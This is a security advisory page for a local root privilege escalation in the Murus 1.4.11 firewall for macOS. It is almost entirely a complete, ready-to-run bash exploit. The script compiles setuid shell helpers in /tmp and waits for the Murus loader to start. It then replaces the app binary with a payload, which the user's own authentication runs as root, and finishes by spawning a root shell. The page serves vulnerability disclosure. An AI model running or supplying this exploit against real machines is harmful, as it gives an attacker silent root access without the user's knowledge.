Murus 1.4.11 Local Privilege Escalation

2017.12.07
Credit: Mark Wadham
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus # firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings. # If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access # without the user knowing. # https://m4.rkw.io/murus1.4.11.sh.txt # 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301 # ------------------------------------------------------------------------------- #!/bin/bash ################################################################## ###### Murus 1.4.11 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html ###### ################################################################## echo "compiling payloads..." cat > /tmp/murus411_exp.c <<EOF #include <unistd.h> int main() { setuid(0); seteuid(0); execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL); return 0; } EOF gcc -o /tmp/murus411_exp /tmp/murus411_exp.c if [ ! $? -eq 0 ] ; then rm -f /tmp/murus411_exp.c echo "failed to compile, dev tools may not be installed" exit 1 fi rm -f /tmp/murus411_exp.c cat > /tmp/murus411_exp2.c <<EOF #include <unistd.h> #include <stdlib.h> int main() { setuid(0); seteuid(0); system("chown root:wheel /tmp/murus411_exp"); system("chmod 4755 /tmp/murus411_exp"); system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\ Murus.app/Contents/MacOS/Murus"); execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL); return 0; } EOF gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c rm -f /tmp/murus411_exp2.c echo "waiting for loader..." while : do ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \ |grep -v grep 1>/dev/null if [ $? -eq 0 ] ; then break fi done echo "planting payload..." mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\ Contents/MacOS/Murus.orig mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus echo "waiting for payload to trigger..." while : do r=`ls -la /tmp/murus411_exp |grep root` if [ "$r" != "" ] ; then break fi sleep 0.1 done echo "kapow" /tmp/murus411_exp


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top